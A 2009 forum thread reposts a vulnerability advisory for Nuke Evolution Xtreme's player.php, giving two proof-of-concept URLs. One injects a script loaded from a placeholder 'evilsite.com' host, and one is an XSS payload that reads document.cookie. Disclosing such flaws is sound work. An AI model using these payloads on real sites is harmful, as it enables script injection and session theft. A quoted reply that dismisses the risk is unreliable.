Clan Adverts

Sponsors

CT on Facebook

Latest Product

Mech Warrior Online Xtreme Theme
Mech Warrior Online Xtreme Theme

User Box

Anonymous
38.107.179.219
Nickname:

Password:

Security Code
Security Code
Type Security Code


PND Downloads Feed

Phpnuke Downloads
How to Delete or Reset yo...
How to Delete or Reset your PHPNuke Admin Account
Lost your admin password ?  Cant login to your admin account ? This s...
Back Online & Stuff
Back Online & Stuff
Look at us with our nifty website back up and running… Seriously...
How to edit the admins in...
How to edit the admins in the forums
Here is a way to make someone admin in your forums on your Evo site. I...
Demo Splash Screen
Demo Splash Screen
Ped @ Clan Themes has released a simple splash screen entrance hack. ...
Free Phpnuke Business The...
Free Phpnuke Business Theme 6
This is the 6th Business theme for Phpnuke that Clan Themes has releas...
Tricked Out Slider
Tricked Out Slider
We have seen some great new things come out of Tricked Out News and th...

Custom Work

PHP Nuke Custom Work

www.clanthemes.com :: View topic - Nuke evolution extreme: vulnerabilities ( rfi + xss)
Nuke evolution extreme: vulnerabilities ( rfi + xss)

1 Replies / 762 Views
Post new topic   Reply to topic  

   www.clanthemes.com Forum Index » Nuke-Evolution

View previous topic :: View next topic

Snype
Reputation: 304.8 Add RepSubtract Rep
votes: 8
Local time: 7:47 PM
Location: lincolshire
uk.gif

0.53 posts per day
Medals: 1 (View more...)
Site Supporter (Amount: 1)
Respected Member
Respected Member
Joined: May 20, 2008
Last Visit: 27 Mar 2012
Posts: 779
Points: 60766 
Post Nuke evolution extreme: vulnerabilities ( rfi + xss) Posted: Fri Apr 17, 2009 12:09 pm
Shop Purchases:Call of Duty 4 SAS Theme
Title: Nuke Evolution Extreme: Vulnerabilities ( RFI + XSS)

Vendor: http://evolution-xtreme.com

Discovered by : baxr6

File affected: player.php

This file is extrememly buggy.Santize variables properly.

Quote:
proofs of concept:
RFI Example: http://www.site.com/path/player.php?&defaultVisualExt=1<ScRiPt+src=http://evilsite.com/gobaby.js? you get the picture :)
XSS Example: http://www.site.com/path/player.php?&defaultVisualExt=1>"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>


this was posted at future nuke and i also just found it on the xtreme site so i just copy and pasted it here

Quote:
Ive been running Xtreme since before it was even released as my main site. Ive never en counted any logs referring to this kind of hole. I wouldnt worry about it as they think they know everything when really i think there just worried that Evo Xtreme will take there users and Platinum will die.

If its been fine for me this whole time since it was in BETA there sure as hell aint nothing wrong with it
 

WebSite > http://www.phpnukeblog.info Xfire > DDsnype MSN > ritchietaylor@live.co.uk Email > admin@phpnukeblog.info  
View user's profileSend private messageVisit poster's websiteMSN Messenger Reply with quote

Amay_Zing
Reputation: 480.3 Add RepSubtract Rep
Local time: 7:47 PM
Location: North Yorkshire
uk.gif

 Noob
Noob

0.01 posts per day
Medals: 0
Joined: Jul 13, 2007
Last Visit: 01 Sep 2009
Posts: 17
Points: 214 
Post Nuke evolution extreme: vulnerabilities ( rfi + xss) Posted: Fri Apr 17, 2009 3:05 pm
Yes I saw that too. do you think there will be a fix soon?
 

 
View user's profileSend private messageSend e-mailVisit poster's websiteMSN Messenger Reply with quote
Post new topic   Reply to topic  
   www.clanthemes.com Forum Index » Nuke-Evolution


 
1 Replies / 762 Views
Page 1 of 1
All times are GMT
Display posts from previous:   
 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum
 

Company Information
Home · About Us · Affiliates · Advertising
Link To Us · Newsletter · Contact Us · Site Map
All content © Clan Themes 2006 - 2012
Based on RavenNuke